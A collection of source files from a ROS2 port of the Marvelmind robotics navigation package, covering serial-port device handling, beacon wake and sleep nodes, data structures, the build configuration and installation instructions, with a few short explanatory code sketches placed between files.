MM_LOCATIONS_VERSION==2\r\n// Update device location\r\nMarvelmindDevice *marvelmindUpdateLocation(uint8_t address, MarvelmindDeviceLocation2 *ppos) {\r\n MarvelmindDevice *mmDevice;\r\n\r\n mmDevice= getMarvelmindDevice(address);\r\n if (mmDevice == NULL)\r\n return NULL;\r\n\r\n if (mmDevice->pos.x_mm == ppos->x_mm)\r\n if 
(mmDevice->pos.y_mm == ppos->y_mm)\r\n if (mmDevice->pos.z_mm == ppos->z_mm) {\r\n return NULL;\r\n }\r\n\r\n mmDevice->pos= *ppos;\r\n\r\n return mmDevice;\r\n}\r\n#endif// #if MM_LOCATIONS_VERSION==2\r\n\r\n// Update distance to device\r\nMarvelmindDevice *marvelmindUpdateDistance(uint8_t addressRx, uint8_t addressTx, uint32_t d) {\r\n MarvelmindDevice *mmDeviceRx;\r\n\r\n mmDeviceRx= getMarvelmindDevice(addressRx);\r\n if (mmDeviceRx == NULL)\r\n return NULL;\r\n\r\n uint32_t dPrev= mmDeviceRx->distances[addressTx].distance_mm;\r\n if (d == dPrev) {\r\n return NULL;\r\n }\r\n\r\n mmDeviceRx->distances[addressTx].distance_mm= d;\r\n\r\n return mmDeviceRx;\r\n}\r\n\r\n// Initialize structure of Marvelmind devices\r\nvoid initMarvelmindDevicesList() {\r\n mmDevList.numDevices= 0;\r\n\r\n#ifdef WIN32\r\n prevReadTime= clock();\r\n#else\r\n\tclock_gettime(CLOCK_REALTIME, &prevReadTime);\r\n#endif\r\n\r\n uint8_t i,j;\r\n for(i=0;i<MM_MAX_DEVICES_COUNT;i++) {\r\n for(j=0;j<MM_MAX_DEVICES_COUNT;j++) {\r\n mmDevList.devices[i].distances[j].distance_mm= 0;\r\n }\r\n }\r\n}\r\n"
},
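The device-list maintenance above is a classic reconcile: compare the freshly read list against the cached one, drop devices that disappeared (`removeAbsentDevices`), and add or update the rest (`addNewDevices`). Keyed by address, the same reconciliation is compact in Python (a sketch of the pattern only, not the C data layout):

```python
def reconcile(current: dict, fresh: dict) -> dict:
    # current and fresh both map device address -> device info
    merged = {}
    for address, info in fresh.items():
        if current.get(address) == info:
            merged[address] = current[address]   # unchanged device, keep as-is
        else:
            merged[address] = info               # added or updated device
    return merged  # devices absent from `fresh` are dropped

devices = {9: {"type": "beacon"}}
devices = reconcile(devices, {9: {"type": "beacon"}, 10: {"type": "hedgehog"}})
print(sorted(devices))  # [9, 10]
```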
{
"alpha_fraction": 0.5097631812095642,
"alphanum_fraction": 0.5346904993057251,
"avg_line_length": 21.368932723999023,
"blob_id": "db035a11843de91404e5335cd31c81e639afe747",
"content_id": "5889ac9b3567efb88c6ccd926b95b80f7f96860b",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2407,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 103,
"path": "/marvelmind_nav/src/marvelmind_utils.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include \"marvelmind_nav/marvelmind_utils.h\"\r\n#ifdef WIN32\r\n#include <windows.h>\r\n#else\r\n#include <unistd.h>\r\n#include <time.h>\r\n#endif\r\n\r\nvoid printBoolEnabled(char * prefix,bool v) {\r\n if (v) {\r\n printf(\"%s: enabled\\r\\n\", prefix);\r\n } else {\r\n printf(\"%s: disabled\\r\\n\", prefix);\r\n }\r\n}\r\n\r\nint boolAsInt(bool v) {\r\n if (v)\r\n return 1;\r\n else\r\n return 0;\r\n}\r\n\r\n// Cross platform sleep function\r\nvoid sleep_ms(int ms) {\r\n #ifdef WIN32\r\n Sleep(ms);\r\n #else\r\n usleep(ms*1000);\r\n #endif // WIN32\r\n}\r\n\r\n// Trim unprintable characters from the string\r\nvoid trim(char * const a)\r\n{\r\n char *p = a, *q = a;\r\n while (isspace(*q)) ++q;\r\n while (*q) *p++ = *q++;\r\n *p = '\\0';\r\n while (p > a && isspace(*--p)) *p = '\\0';\r\n}\r\n\r\n// Returns device type by hardware type id\r\nMMDeviceType getMMDeviceType(uint8_t deviceType) {\r\n if (mmDeviceIsModem(deviceType)) {\r\n return modem;\r\n }\r\n if (mmDeviceIsBeacon(deviceType)) {\r\n return beacon;\r\n }\r\n if (mmDeviceIsHedgehog(deviceType)) {\r\n return hedgehog;\r\n }\r\n\r\n return unknown;\r\n}\r\n\r\n// Prints version and ID of the device\r\nvoid printMMDeviceVersionAndId(MarvelmindDeviceVersion *dv) {\r\n printf(\"Version: %d.%02d\", (int) dv->fwVerMajor, (int) dv->fwVerMinor);\r\n printf(\"%01d\", (int) dv->fwVerMinor2);\r\n //if (dv->fwVerMinor2 != 0) {\r\n // printf(\"%c\",(char) (dv->fwVerMinor2+'a' - 1));\r\n //}\r\n printf(\".%d CPU ID=%06x\", (int) dv->fwVerDeviceType, dv->cpuId);\r\n printf(\"\\r\\n\");\r\n}\r\n\r\n// Prints device type\r\nvoid printMMDeviceType(MMDeviceType *dt) {\r\n switch(*dt) {\r\n case modem: {\r\n printf(\"Device is modem \\r\\n\");\r\n break;\r\n }\r\n case beacon: {\r\n printf(\"Device is beacon \\r\\n\");\r\n break;\r\n }\r\n case hedgehog: {\r\n printf(\"Device is hedgehog \\r\\n\");\r\n break;\r\n }\r\n default: {\r\n printf(\"Unknown device type \\r\\n\");\r\n break;\r\n }\r\n }\r\n}\r\n\r\n#ifndef WIN32\r\ndouble getPassedTime(struct timespec *t1, struct timespec*t2) {\r\n\tdouble t1_fs= t1->tv_nsec/1000000000.0;\r\n\tdouble t2_fs= t2->tv_nsec/1000000000.0;\r\n\r\n\tdouble dt_sec= t2->tv_sec - t1->tv_sec;\r\n\r\n\treturn (dt_sec) + (t2_fs - t1_fs);\r\n}\r\n#endif\r\n"
},
{
"alpha_fraction": 0.6138515472412109,
"alphanum_fraction": 0.6248131394386292,
"avg_line_length": 22.904762268066406,
"blob_id": "54c3a7c518fc4a3800c480b2c818734fef068462",
"content_id": "65cd4abcf2e1d1f4751cbf1f97b6e2de19698850",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2007,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 84,
"path": "/marvelmind_nav/src/publisher_member_function.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <chrono>\n#include <functional>\n#include <memory>\n#include <string>\n#include <iostream> \n#include \"rclcpp/rclcpp.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_example.h\"\n#include \"marvelmind_nav/marvelmind_devices.h\"\n#include \"marvelmind_nav/marvelmind_utils.h\"\n#include \"marvelmind_nav/marvelmind_pos.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\nusing namespace std::chrono_literals;\n\n/* This example creates a subclass of Node and uses std::bind() to register a\n* member function as a callback from the timer. */\n\n\nclass MinimalPublisher : public rclcpp::Node\n{\n public:\n MinimalPublisher()\n : Node(\"minimal_publisher\"), count_(0)\n {\n publisher_ = this->create_publisher<std_msgs::msg::String>(\"topic\", 10);\n timer_ = this->create_wall_timer(\n 500ms, std::bind(&MinimalPublisher::timer_callback, this));\n \n }\n\n private:\n void timer_callback()\n {\n auto message = std_msgs::msg::String();\n message.data = \"Hello, world! \" + std::to_string(count_++);\n // RCLCPP_INFO(this->get_logger(), \"Publishing: '%s'\", message.data.c_str());\n publisher_->publish(message);\n // marvelmindCycle();\n // checkCommand();\n }\n rclcpp::TimerBase::SharedPtr timer_;\n rclcpp::Publisher<std_msgs::msg::String>::SharedPtr publisher_;\n size_t count_;\n};\n\n\n// int main(int argc, char * argv[])\n// {\n// rclcpp::init(argc, argv);\n// marvelmindStart();\n// // rclcpp::spin(std::make_shared<MinimalPublisher>());\n// while(1) \n// {\n// marvelmindCycle();\n// sleep_ms(1);\n// }\n\n// marvelmindFinish();\n\n// // rclcpp::shutdown();\n// return 0;\n// }\n\n\nint main()\n{\n marvelmindStart();\n char str[6] = {'w', 'a', 'k', 'e', ' ','0'};\n char *token1 = strtok(str, \" \");\n trim(token1);\n char *token2 = strtok(NULL, \" \");\n while(!marvelmindCycle());\n while(marvelmindCheckWakeCommand(token1, token2));\n sleep_ms(10000);\n\n\n marvelmindFinish();\n\n return 0;\n}"
},
{
"alpha_fraction": 0.7360720038414001,
"alphanum_fraction": 0.7591446042060852,
"avg_line_length": 38.488887786865234,
"blob_id": "15f5822b9cd0923b4bc36c455a2f3f2cd7143e9e",
"content_id": "8815881e10f07fccdd2bc2ec1574b4e055c8d32f",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1789,
"license_type": "permissive",
"max_line_length": 242,
"num_lines": 45,
"path": "/README.md",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "# Marvelmind ROS2 Package\n\nThis package is a port of the [ros_marvelmind_package](https://bitbucket.org/marvelmind_robotics/ros_marvelmind_package/src/master/)\nfrom ROS to ROS2. All rights, as mentioned by the License, reserved by Marvelmind Robotics.\n\n# Installation from source\nSimply clone this package to your workspace inside the src directory.. \nThen from the root of your workspace, install all dependencies with \n```\nrosdep install --from-paths src --ignore-src --rosdistro eloquent -r -y\n```\nAnd then build with\n```\ncolcon build --symlink-install\n```\nThis package was developed on and tested on ROS2 Foxy running on Ubuntu 20.04. \n\n## Prerequisites\n1. Ensure user is added to `dialout` group to get access to serial port. (needs a reboot) \n2. Follow the instructions on [this page](https://marvelmind.com/pics/marvelmind_ROS.pdf) as well to ensure the same access.\n3. You can also add a file called `99-tty.rules` under `/etc/udev/rules.d` with the following content:\n```\n#Marvelmind serial port rules\nKERNEL==”ttyACM0”,GROUP=”dialout”,MODE=”666”\n```\n\n## Bringup\n\nOnce you have ensured that a beacon or modem is connected to your PC, launch with:\n```\nros2 launch marvelmind_nav marvel_driver_launch.py \n```\nFor read Beacon position and timestamp.\nTo change the Port name, edit the launch file and replace it in [this line](https://github.com/ipa-kut/ros_marvelmind_package/blob/a032ac60ac72a85ef5d4dfa5bee3d10e265fd9d8/marvelmind_nav/launch/marvel_driver_launch.py#L28) in the launch file.\n\nWhen the Modem is connected to your PC, You can sleep and wake up all of the beacon in system with these commands. \n\nSleep all the beacon with \n```\nros2 launch marvelmind_nav sleep_beacon \n```\nWake all the beacon with \n```\nros2 launch marvelmind_nav wake_beacon\n```\n"
},
{
"alpha_fraction": 0.6819185614585876,
"alphanum_fraction": 0.7092142701148987,
"avg_line_length": 24.65991973876953,
"blob_id": "c62dc0ff2f0cced9b9309254fe69d0ae78e0ce7a",
"content_id": "753c01117a239eb9ff3aef5d64b289fa9fcbcbfe",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 6338,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 247,
"path": "/marvelmind_nav/include/marvelmind_nav/marvelmind_hedge.h",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "/*\nCopyright (c) 2020, Marvelmind Robotics\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND ANY\nEXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY\nDIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n*/\n\n#pragma once\n#include <stdint.h>\n#include <stdbool.h>\n#include <stddef.h>\n\n#define DATA_INPUT_SEMAPHORE \"/data_input_semaphore\"\n\nstruct PositionValue\n{\n uint8_t address;\n uint32_t timestamp;\n int32_t x, y, z;// coordinates in millimeters\n uint8_t flags;\n \n double angle;\n\n bool highResolution;\n\n bool ready;\n bool processed;\n};\n\nstruct RawIMUValue\n{\n int16_t acc_x;\n int16_t acc_y;\n int16_t acc_z;\n \n int16_t gyro_x;\n int16_t gyro_y;\n int16_t gyro_z;\n \n int16_t compass_x;\n int16_t compass_y;\n int16_t compass_z;\n \n uint32_t timestamp;\n \n bool updated;\n};\n\nstruct FusionIMUValue\n{\n int32_t x;\n int32_t y;\n int32_t z;// coordinates in mm\n \n int16_t qw;\n int16_t qx;\n int16_t qy;\n int16_t qz;// quaternion, normalized to 10000\n \n int16_t vx;\n int16_t vy;\n int16_t vz;// velocity, mm/s\n \n int16_t ax;\n int16_t ay;\n int16_t az;// acceleration, mm/s^2\n \n uint32_t timestamp;\n \n bool updated;\n};\n\nstruct RawDistanceItem\n{\n uint8_t address_beacon;\n uint32_t distance;// distance, mm\n};\nstruct RawDistances\n{\n uint8_t address_hedge;\n struct RawDistanceItem distances[4];\n \n bool updated;\n};\n\nstruct StationaryBeaconPosition\n{\n uint8_t address;\n int32_t x, y, z;// coordinates in millimeters\n\n bool updatedForMsg;\n bool highResolution;\n};\n#define MAX_STATIONARY_BEACONS 255\nstruct StationaryBeaconsPositions\n{\n uint8_t numBeacons;\n struct StationaryBeaconPosition beacons[MAX_STATIONARY_BEACONS];\n\n bool updated;\n};\n\nstruct TelemetryData\n{\n uint16_t vbat_mv;\n int8_t rssi_dbm;\n\n bool updated;\n};\n\nstruct QualityData\n{\n uint8_t address;\n uint8_t quality_per;\n\n bool updated;\n};\n\n#define MAX_WAYPOINTS_NUM 255\nstruct WaypointData\n{\n\tuint8_t movementType;\n\tint16_t param1;\n\tint16_t param2;\n\tint16_t param3;\n\t\n\tbool updated;\n};\nstruct WaypointsData\n{\n\tuint8_t numItems;\n\tstruct WaypointData items[MAX_WAYPOINTS_NUM];\n\t\n\tbool updated;\n};\n\nstruct MarvelmindHedge\n{\n// serial port device name (physical or USB/virtual). 
It should be provided as\n// an argument:\n// /dev/ttyACM0 - typical for Linux / Raspberry Pi\n// /dev/tty.usbmodem1451 - typical for Mac OS X\n const char * ttyFileName;\n\n// Baud rate. Should be match to baudrate of hedgehog-beacon\n// default: 9600\n uint32_t baudRate;\n\n// maximum count of measurements of coordinates stored in buffer\n// default: 3\n uint8_t maxBufferedPositions;\n\n// buffer of measurements\n struct PositionValue * positionBuffer;\n \n struct StationaryBeaconsPositions positionsBeacons;\n \n struct RawIMUValue rawIMU;\n struct FusionIMUValue fusionIMU;\n \n struct RawDistances rawDistances;\n \n struct TelemetryData telemetry;\n struct QualityData quality;\n struct WaypointsData waypoints;\n\n// verbose flag which activate console output\n//\t\tdefault: False\n bool verbose;\n\n//\tpause flag. If True, class would not read serial data\n bool pause;\n\n// If True, thread would exit from main loop and stop\n bool terminationRequired;\n\n// receiveDataCallback is callback function to recieve data\n void (*receiveDataCallback)(struct PositionValue position);\n void (*anyInputPacketCallback)();\n\n// private variables\n uint8_t lastValuesCount_;\n uint8_t lastValues_next;\n bool haveNewValues_;\n#ifdef WIN32\n HANDLE thread_;\n CRITICAL_SECTION lock_;\n#else\n pthread_t thread_;\n pthread_mutex_t lock_;\n#endif\n};\n\n#define POSITION_DATAGRAM_ID 0x0001\n#define BEACONS_POSITIONS_DATAGRAM_ID 0x0002\n#define POSITION_DATAGRAM_HIGHRES_ID 0x0011\n#define BEACONS_POSITIONS_DATAGRAM_HIGHRES_ID 0x0012\n#define IMU_RAW_DATAGRAM_ID 0x0003\n#define BEACON_RAW_DISTANCE_DATAGRAM_ID 0x0004\n#define IMU_FUSION_DATAGRAM_ID 0x0005\n#define TELEMETRY_DATAGRAM_ID 0x0006\n#define QUALITY_DATAGRAM_ID 0x0007\n#define WAYPOINT_DATAGRAM_ID 0x0201\n\nstruct MarvelmindHedge * createMarvelmindHedge ();\nvoid destroyMarvelmindHedge (struct MarvelmindHedge * hedge);\nvoid startMarvelmindHedge (struct MarvelmindHedge * hedge);\n\nvoid printPositionFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n bool onlyNew);\nbool getPositionFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n struct PositionValue * position);\n \nvoid printStationaryBeaconsPositionsFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n bool onlyNew);\nbool getStationaryBeaconsPositionsFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n struct StationaryBeaconsPositions * positions);\nvoid clearStationaryBeaconUpdatedFlag(struct MarvelmindHedge * hedge, uint8_t address);\n \nvoid stopMarvelmindHedge (struct MarvelmindHedge * hedge);\n\n#ifdef WIN32\n#define DEFAULT_TTY_FILENAME \"\\\\\\\\.\\\\COM3\"\n#else\n#define DEFAULT_TTY_FILENAME \"/dev/ttyACM0\"\n#endif // WIN32\n\n#define DEFAULT_TTY_BAUDRATE 9600UL\n"
},
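// A minimal consumer sketch for the marvelmind_hedge.h API above, an
// illustration rather than a file from the package. It follows the same
// polling pattern as marvelmind_navigation.cpp: check haveNewValues_, read
// one position, then clear the flag. The 10 Hz poll rate is an arbitrary
// choice for the sketch.
#include <cstdio>
#include <unistd.h>
extern "C"
{
#include "marvelmind_nav/marvelmind_hedge.h"
}

int main()
{
    struct MarvelmindHedge *hedge = createMarvelmindHedge();
    if (hedge == NULL) return 1;

    hedge->ttyFileName = DEFAULT_TTY_FILENAME; // "/dev/ttyACM0" on Linux
    hedge->baudRate = DEFAULT_TTY_BAUDRATE;    // 9600, must match the hedgehog
    startMarvelmindHedge(hedge);               // spawns the serial read thread

    struct PositionValue position;
    for (int i = 0; i < 100 && !hedge->terminationRequired; ++i) {
        if (hedge->haveNewValues_) {
            getPositionFromMarvelmindHedge(hedge, &position);
            std::printf("addr %d: x=%d mm, y=%d mm, z=%d mm\n",
                        (int) position.address,
                        (int) position.x, (int) position.y, (int) position.z);
            hedge->haveNewValues_ = false;
        }
        usleep(100000); // ~10 Hz poll
    }

    stopMarvelmindHedge(hedge);
    destroyMarvelmindHedge(hedge);
    return 0;
}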
{
"alpha_fraction": 0.6547455191612244,
"alphanum_fraction": 0.6726272106170654,
"avg_line_length": 22.483871459960938,
"blob_id": "7e5e199a025dc624e08d9f065e504f01c0a02ee3",
"content_id": "c953e99280d38c5a516dc9ec70846cf53d1a3f02",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 727,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 31,
"path": "/marvelmind_nav/src/wake_beacon_node.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <chrono>\n#include <string>\n#include <iostream> \n#include \"rclcpp/rclcpp.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_example.h\"\n#include \"marvelmind_nav/marvelmind_devices.h\"\n#include \"marvelmind_nav/marvelmind_utils.h\"\n#include \"marvelmind_nav/marvelmind_pos.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\nusing namespace std::chrono_literals;\n\nint main()\n{\n marvelmindStart();\n char str[6] = {'w', 'a', 'k', 'e', ' ','0'};\n char *token1 = strtok(str, \" \");\n trim(token1);\n char *token2 = strtok(NULL, \" \");\n while(!marvelmindCycle());\n while(marvelmindCheckWakeCommand(token1, token2));\n sleep_ms(10000);\n\n marvelmindFinish();\n\n return 0;\n}"
},
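// A hedged variation on wake_beacon_node.cpp above: the "wake <address>"
// command string is built at run time instead of hard-coding "wake 0". Only
// helpers the original node already calls are used (marvelmindStart,
// marvelmindCycle, marvelmindCheckWakeCommand, trim, sleep_ms,
// marvelmindFinish); their return-value semantics are assumed to be whatever
// makes the original polling loops correct.
#include <cstdio>
#include <cstring>
extern "C"
{
#include "marvelmind_nav/marvelmind_example.h"
#include "marvelmind_nav/marvelmind_devices.h"
#include "marvelmind_nav/marvelmind_utils.h"
#include "marvelmind_nav/marvelmind_pos.h"
#include "marvelmind_nav/marvelmind_api.h"
}

int main(int argc, char **argv)
{
    marvelmindStart();
    char str[32];
    std::snprintf(str, sizeof(str), "wake %s", (argc > 1) ? argv[1] : "0");
    char *token1 = strtok(str, " ");
    trim(token1);
    char *token2 = strtok(NULL, " ");
    while (!marvelmindCycle());
    while (marvelmindCheckWakeCommand(token1, token2));
    sleep_ms(10000);
    marvelmindFinish();
    return 0;
}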
{
"alpha_fraction": 0.6565752029418945,
"alphanum_fraction": 0.6597287654876709,
"avg_line_length": 30.08823585510254,
"blob_id": "833f261443c30f03a04af2edea1b06e6215c93ff",
"content_id": "c49e766f786ecfebd00b133ee92b2ac62ea6954c",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3171,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 102,
"path": "/marvelmind_nav/CMakeLists.txt",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.5)\nproject(marvelmind_nav)\n\n# Default to C99\nif(NOT CMAKE_C_STANDARD)\n set(CMAKE_C_STANDARD 99)\nendif()\n\n# Default to C++14\nif(NOT CMAKE_CXX_STANDARD)\n set(CMAKE_CXX_STANDARD 14)\nendif()\n\nif(CMAKE_COMPILER_IS_GNUCXX OR CMAKE_CXX_COMPILER_ID MATCHES \"Clang\")\n add_compile_options(-Wall -Wextra -Wpedantic)\nendif()\n\n# Dependencies\nfind_package(ament_cmake REQUIRED)\nfind_package(rclcpp REQUIRED)\nfind_package(std_msgs REQUIRED)\nfind_package(rclcpp_lifecycle REQUIRED)\nfind_package(lifecycle_msgs REQUIRED)\nfind_package(marvelmind_interfaces REQUIRED)\nfind_package(rmw REQUIRED) #QoS\n\n# Declare includes and libraries\ninclude_directories(include)\nament_export_include_directories(include)\nadd_library(marvelmind_nav_lib\n src/marvelmind_hedge.c\n src/marvelmind_api.c\n src/marvelmind_devices.c\n src/marvelmind_example.c\n src/marvelmind_pos.c\n src/marvelmind_utils.c\n)\n\n# Executables\nadd_executable(marvelmind_nav src/marvelmind_navigation.cpp\n src/marvelmind_hedge.c)\nament_target_dependencies(marvelmind_nav rclcpp std_msgs marvelmind_interfaces)\n\n# add_executable(talker src/publisher_member_function.cpp\n# \t\t\t src/marvelmind_hedge.c\n# src/marvelmind_api.c\n# src/marvelmind_devices.c\n# src/marvelmind_example.c\n# src/marvelmind_pos.c\n# src/marvelmind_utils.c)\n# ament_target_dependencies(talker rclcpp std_msgs)\n\nadd_executable(wake_beacon src/wake_beacon_node.cpp\n\t\t\t src/marvelmind_hedge.c\n src/marvelmind_api.c\n src/marvelmind_devices.c\n src/marvelmind_example.c\n src/marvelmind_pos.c\n src/marvelmind_utils.c)\nament_target_dependencies(wake_beacon rclcpp std_msgs)\n\nadd_executable(sleep_beacon src/sleep_beacon_node.cpp\n\t\t\t src/marvelmind_hedge.c\n src/marvelmind_api.c\n src/marvelmind_devices.c\n src/marvelmind_example.c\n src/marvelmind_pos.c\n src/marvelmind_utils.c)\nament_target_dependencies(sleep_beacon rclcpp std_msgs)\n\n#ament_target_dependencies(talker rclcpp std_msgs)\ntarget_link_libraries(marvelmind_nav\n ${rclcpp_lifecycle_LIBRARIES}\n ${std_msgs_LIBRARIES}\n)\n\n\n# Installation\ninstall(TARGETS\n marvelmind_nav\n sleep_beacon\n wake_beacon\n DESTINATION lib/${PROJECT_NAME})\n\n\ninstall(DIRECTORY\n launch\n DESTINATION share/${PROJECT_NAME}/\n)\n\nif(BUILD_TESTING)\n find_package(ament_lint_auto REQUIRED)\n # the following line skips the linter which checks for copyrights\n # uncomment the line when a copyright and license is not present in all source files\n #set(ament_cmake_copyright_FOUND TRUE)\n # the following line skips cpplint (only works in a git repo)\n # uncomment the line when this package is not in a git repo\n #set(ament_cmake_cpplint_FOUND TRUE)\n ament_lint_auto_find_test_dependencies()\nendif()\n\nament_package()\n"
},
{
"alpha_fraction": 0.6126958131790161,
"alphanum_fraction": 0.6329208612442017,
"avg_line_length": 28.57028579711914,
"blob_id": "3f9821075c93df2848392f735b839848ed907dc1",
"content_id": "c0f180358b0e208a495f5bbc7fdcb1020f0c50ea",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 26749,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 875,
"path": "/marvelmind_nav/src/marvelmind_api.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include \"marvelmind_nav/marvelmind_api.h\"\r\n\r\n#define __stdcall\r\n#ifdef WIN32\r\n#include <windows.h>\r\n#else\r\n// extern \"C\" {\r\n#include <dlfcn.h>\r\n// }\r\n#endif\r\n\r\n#ifdef WIN32\r\nHINSTANCE mmLibrary;\r\n#else\r\nvoid* mmLibrary;\r\n#endif\r\n\r\ntypedef bool (*pt_mm_api_version)(void *pdata);\r\nstatic pt_mm_api_version pmm_api_version= NULL;\r\nbool mmAPIVersion(uint32_t *version) {\r\n if (pmm_api_version == NULL)\r\n return false;\r\n\r\n uint8_t buf[8];\r\n bool res= (*pmm_api_version)(&buf[0]);\r\n\r\n *version= *((uint32_t *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_open_port)(void);\r\nstatic pt_mm_open_port pmm_open_port= NULL;\r\nbool mmOpenPort() {\r\n // printf(\"oooo\\n\");\r\n if (pmm_open_port == NULL)\r\n return false;\r\n \r\n return (*pmm_open_port)();\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_open_port_by_name)(void *pdata);\r\nstatic pt_mm_open_port_by_name pmm_open_port_by_name= NULL;\r\nbool mmOpenPortByName(char *portName) {\r\n if (pmm_open_port_by_name == NULL)\r\n return false;\r\n\r\n uint8_t buf[255];\r\n uint8_t i;\r\n for(i=0;i<255;i++) {\r\n buf[i]= portName[i];\r\n if (buf[i] == 0)\r\n break;\r\n }\r\n for(i=0;i<255;i++) {\r\n printf(\"%u\",portName[i]);\r\n if (buf[i] == 0)\r\n printf(\"\\n\");\r\n break;\r\n } \r\n return (*pmm_open_port_by_name)(&buf[0]);\r\n}\r\n\r\n//////\r\n\r\ntypedef void (*pt_mm_close_port)(void);\r\nstatic pt_mm_close_port pmm_close_port= NULL;\r\nvoid mmClosePort() {\r\n if (pmm_close_port == NULL)\r\n return;\r\n\r\n (*pmm_close_port)();\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_version_and_id)(uint8_t address, void *pdata);\r\nstatic pt_mm_get_version_and_id pmm_get_version_and_id= NULL;\r\nbool mmGetVersionAndId(uint8_t address, MarvelmindDeviceVersion *mmDevVersion) {\r\n if (pmm_get_version_and_id == NULL)\r\n return false;\r\n\r\n uint8_t buf[128];\r\n bool res= (*pmm_get_version_and_id)(address, &buf[0]);\r\n\r\n mmDevVersion->fwVerMajor= buf[0];\r\n mmDevVersion->fwVerMinor= buf[1];\r\n mmDevVersion->fwVerMinor2= buf[2];\r\n mmDevVersion->fwVerDeviceType= buf[3];\r\n mmDevVersion->fwOptions= buf[4];\r\n\r\n mmDevVersion->cpuId= *((uint32_t *) &buf[5]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_devices_list)(void *pdata);\r\nstatic pt_mm_get_devices_list pmm_get_devices_list= NULL;\r\nbool mmGetDevicesList(MarvelmindDevicesList *mmDevices) {\r\n if (pmm_get_devices_list == NULL)\r\n return false;\r\n\r\n uint8_t buf[(MM_MAX_DEVICES_COUNT+1)*10];\r\n\r\n bool res= (*pmm_get_devices_list)(&buf[0]);\r\n\r\n if (res) {\r\n uint8_t i;\r\n MarvelmindDeviceInfo *devPtr;\r\n\r\n mmDevices->numDevices= buf[0];\r\n\r\n uint32_t ofs= 1;\r\n for(i=0;i<mmDevices->numDevices;i++) {\r\n devPtr= &mmDevices->devices[i];\r\n\r\n devPtr->address= buf[ofs+0];\r\n devPtr->isDuplicatedAddress= (bool) buf[ofs+1];\r\n devPtr->isSleeping= (bool) buf[ofs+2];\r\n\r\n devPtr->fwVerMajor= buf[ofs+3];\r\n devPtr->fwVerMinor= buf[ofs+4];\r\n devPtr->fwVerMinor2= buf[ofs+5];\r\n devPtr->fwVerDeviceType= buf[ofs+6];\r\n\r\n devPtr->fwOptions= buf[ofs+7];\r\n\r\n devPtr->flags= buf[ofs+8];\r\n\r\n ofs+= 9;\r\n }\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_wake_device)(uint8_t address);\r\nstatic pt_mm_wake_device pmm_wake_device= NULL;\r\nbool mmWakeDevice(uint8_t address) {\r\n if (pmm_wake_device == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_wake_device)(address);\r\n\r\n return 